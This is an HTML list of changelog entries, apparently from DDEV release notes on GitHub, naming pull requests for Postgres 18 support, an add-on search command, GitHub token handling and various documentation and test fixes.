<li>docs: Merge AI instruction files AGENTS.md CLAUDE.md copilot-instructions.md, symlink, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3425487467" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7632" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7632/hovercard" href="https://github.com/ddev/ddev/issues/7632">#7632</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3437151146" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7644" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7644/hovercard" href="https://github.com/ddev/ddev/pull/7644">#7644</a></li>
<li>docs(faq): remove traefik config when changing project's name, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3432283969" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7638" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7638/hovercard" href="https://github.com/ddev/ddev/issues/7638">#7638</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ara303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ara303">@ara303</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3432583948" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7639" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7639/hovercard" href="https://github.com/ddev/ddev/pull/7639">#7639</a></li>
<li>chore(deps): update vendor to current, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419688927" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7624" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7624/hovercard" href="https://github.com/ddev/ddev/issues/7624">#7624</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3437116266" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7643" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7643/hovercard" href="https://github.com/ddev/ddev/pull/7643">#7643</a></li>
<li>fix(upsun): upsun should resume paused environment at start [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3445318704" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7650" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7650/hovercard" href="https://github.com/ddev/ddev/pull/7650">#7650</a></li>
<li>feat(docker): auto HTTP/S communication via network aliases instead of external_links by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3434920736" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7642" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7642/hovercard" href="https://github.com/ddev/ddev/pull/7642">#7642</a></li>
<li>test: fix TestNetworkAliases, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450067740" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7657" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7657/hovercard" href="https://github.com/ddev/ddev/issues/7657">#7657</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450164194" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7658" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7658/hovercard" href="https://github.com/ddev/ddev/pull/7658">#7658</a></li>
<li>feat: enhance PHP addon environment with DockerEnv() integration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3446430956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7651" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7651/hovercard" href="https://github.com/ddev/ddev/pull/7651">#7651</a></li>
<li>test(buildkite): group log output by <code>--- RUN</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3437161238" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7645" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7645/hovercard" href="https://github.com/ddev/ddev/pull/7645">#7645</a></li>
<li>feat: Update AGENTS.md to reference organization-wide patterns by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3454384738" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7659" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7659/hovercard" href="https://github.com/ddev/ddev/pull/7659">#7659</a></li>
<li>fix(cakephp): do not override APP_DEFAULT_LOCALE by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3448243418" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7653" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7653/hovercard" href="https://github.com/ddev/ddev/pull/7653">#7653</a></li>
<li>fix(hack-postgres): hack postgres client since postgresql-client:18 is misbehaving, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455295219" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7661" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7661/hovercard" href="https://github.com/ddev/ddev/issues/7661">#7661</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455344956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7663" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7663/hovercard" href="https://github.com/ddev/ddev/pull/7663">#7663</a></li>
<li>fix(postgres): uninstall postgresql-client with its dependencies, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455344956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7663" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7663/hovercard" href="https://github.com/ddev/ddev/pull/7663">#7663</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3456310420" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7665" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7665/hovercard" href="https://github.com/ddev/ddev/pull/7665">#7665</a></li>
<li>docs: platform.sh-&gt;upsun name changes, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3449367609" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7654" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7654/hovercard" href="https://github.com/ddev/ddev/issues/7654">#7654</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3465699063" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7673" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7673/hovercard" href="https://github.com/ddev/ddev/pull/7673">#7673</a></li>
<li>feat(warnings): Allow silencing warnings about custom config files, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3432283969" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7638" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7638/hovercard" href="https://github.com/ddev/ddev/issues/7638">#7638</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455251590" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7660" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7660/hovercard" href="https://github.com/ddev/ddev/pull/7660">#7660</a></li>
<li>feat(test-ddev): add more distro info and default shell to ddev debug test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3457881955" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7666" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7666/hovercard" href="https://github.com/ddev/ddev/pull/7666">#7666</a></li>
<li>feat(postgres): Support postgres:18, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455295219" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7661" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7661/hovercard" href="https://github.com/ddev/ddev/issues/7661">#7661</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455304373" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7662" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7662/hovercard" href="https://github.com/ddev/ddev/pull/7662">#7662</a></li>
<li>feat: add <code>ddev add-on search</code> subcommand, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3271485002" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7491" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7491/hovercard" href="https://github.com/ddev/ddev/issues/7491">#7491</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3349955579" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7554" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7554/hovercard" href="https://github.com/ddev/ddev/pull/7554">#7554</a></li>
<li>feat(db): remove the hardcoded --server-id=0 parameter from MySQL startup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2685087951" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6768" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6768/hovercard" href="https://github.com/ddev/ddev/issues/6768">#6768</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3398642974" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7608" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7608/hovercard" href="https://github.com/ddev/ddev/pull/7608">#7608</a></li>
<li>chore(buildkite): add DDEV_GITHUB_TOKEN for DDEV_RUN_GET_TESTS and don't run tests on skip by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3473506770" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7680" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7680/hovercard" href="https://github.com/ddev/ddev/pull/7680">#7680</a></li>
<li>build(image): use native arm builder for building docker images, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3338014772" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7539" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7539/hovercard" href="https://github.com/ddev/ddev/issues/7539">#7539</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3349925299" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7553" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7553/hovercard" href="https://github.com/ddev/ddev/pull/7553">#7553</a></li>
<li>fix(postgres): normalize path on Windows, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3470721135" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7679" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7679/hovercard" href="https://github.com/ddev/ddev/issues/7679">#7679</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474063665" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7682" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7682/hovercard" href="https://github.com/ddev/ddev/pull/7682">#7682</a></li>
<li>feat: update ddev debug test to emphasize global ddev dir [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3477745569" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7684" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7684/hovercard" href="https://github.com/ddev/ddev/pull/7684">#7684</a></li>
<li>feat: use 'ddev utility' instead of 'ddev debug', fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3477427379" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7683" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7683/hovercard" href="https://github.com/ddev/ddev/issues/7683">#7683</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3477852641" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7685" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7685/hovercard" href="https://github.com/ddev/ddev/pull/7685">#7685</a></li>
<li>docs(moodle): update moodle quickstart to have composer_root in root, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3484138162" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7692" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7692/hovercard" href="https://github.com/ddev/ddev/issues/7692">#7692</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3484153441" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7693" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7693/hovercard" href="https://github.com/ddev/ddev/pull/7693">#7693</a></li>
<li>fix: disable <code>.env</code> parsing for <code>docker-compose pull</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3464922448" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7671" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7671/hovercard" href="https://github.com/ddev/ddev/issues/7671">#7671</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3480926589" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7687" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7687/hovercard" href="https://github.com/ddev/ddev/pull/7687">#7687</a></li>
<li>chore: remove contributors.yml and use latest golangci-lint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3489020702" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7699" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7699/hovercard" href="https://github.com/ddev/ddev/pull/7699">#7699</a></li>
<li>fix: don't use GITHUB_OWNER variable for install_ddev.sh, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3482540529" data-permission-text="Title is private" data-url="https://github.com/ddev/github-action-setup-ddev/issues/54" data-hovercard-type="issue" data-hovercard-url="/ddev/github-action-setup-ddev/issues/54/hovercard" href="https://github.com/ddev/github-action-setup-ddev/issues/54">ddev/github-action-setup-ddev#54</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3486745234" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7695" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7695/hovercard" href="https://github.com/ddev/ddev/pull/7695">#7695</a></li>
<li>fix: show if DDEV_GITHUB_TOKEN was used in download requests, add DDEV_GLOBAL_DIR env, skip add-on tests without token, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3434583644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7641" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7641/hovercard" href="https://github.com/ddev/ddev/issues/7641">#7641</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3479281007" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7686" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7686/hovercard" href="https://github.com/ddev/ddev/pull/7686">#7686</a></li>
<li>fix: start container only after attach in <code>ddev auth ssh</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455928717" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7664" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7664/hovercard" href="https://github.com/ddev/ddev/issues/7664">#7664</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3473843705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7681" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7681/hovercard" href="https://github.com/ddev/ddev/pull/7681">#7681</a></li>
<li>feat(dockercheck): improve ddev ut dockercheck, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3465496916" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7672" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7672/hovercard" href="https://github.com/ddev/ddev/issues/7672">#7672</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3484025675" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7690" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7690/hovercard" href="https://github.com/ddev/ddev/pull/7690">#7690</a></li>
<li>fix: improve MOTD and sponsorship message controls, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3247470227" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7468" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7468/hovercard" href="https://github.com/ddev/ddev/issues/7468">#7468</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3469571696" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7676" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7676/hovercard" href="https://github.com/ddev/ddev/issues/7676">#7676</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2799882615" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6918" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6918/hovercard" href="https://github.com/ddev/ddev/issues/6918">#6918</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3484043051" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7691" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7691/hovercard" href="https://github.com/ddev/ddev/pull/7691">#7691</a></li>
<li>fix: ddev debug test shouldn't leave dead ddev-utilities containers [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3491911964" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7701" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7701/hovercard" href="https://github.com/ddev/ddev/pull/7701">#7701</a></li>
<li>refactor(add-ons): exclude archived repositories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3496640437" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7705" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7705/hovercard" href="https://github.com/ddev/ddev/pull/7705">#7705</a></li>
<li>test: npmjs.com no longer allows unchallenged curl [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3506722224" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7706" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7706/hovercard" href="https://github.com/ddev/ddev/pull/7706">#7706</a></li>
<li>docs(macos): bump system requirements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3533333391" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7729" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7729/hovercard" href="https://github.com/ddev/ddev/pull/7729">#7729</a></li>
<li>fix(codespaces): use lightweight debian-12 image, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3063729923" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7294" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7294/hovercard" href="https://github.com/ddev/ddev/issues/7294">#7294</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3517469856" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7713" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7713/hovercard" href="https://github.com/ddev/ddev/pull/7713">#7713</a></li>
<li>fix(github): retry without auth on invalid GitHub token, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3434583644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7641" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7641/hovercard" href="https://github.com/ddev/ddev/issues/7641">#7641</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3525967876" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7717" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7717/hovercard" href="https://github.com/ddev/ddev/pull/7717">#7717</a></li>
<li>fix(mutagen): use fixed length for <code>com.ddev.volume-signature</code> label, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3514570713" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7710" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7710/hovercard" href="https://github.com/ddev/ddev/issues/7710">#7710</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3517349613" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7712" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7712/hovercard" href="https://github.com/ddev/ddev/pull/7712">#7712</a></li>
<li>docs: add commands for preparing DDEV to work offline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3532568292" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7726" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7726/hovercard" href="https://github.com/ddev/ddev/pull/7726">#7726</a></li>
<li>docs: fix a little custom command annotations code example by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TravisCarden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TravisCarden">@TravisCarden</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3515388161" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7711" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7711/hovercard" href="https://github.com/ddev/ddev/pull/7711">#7711</a></li>
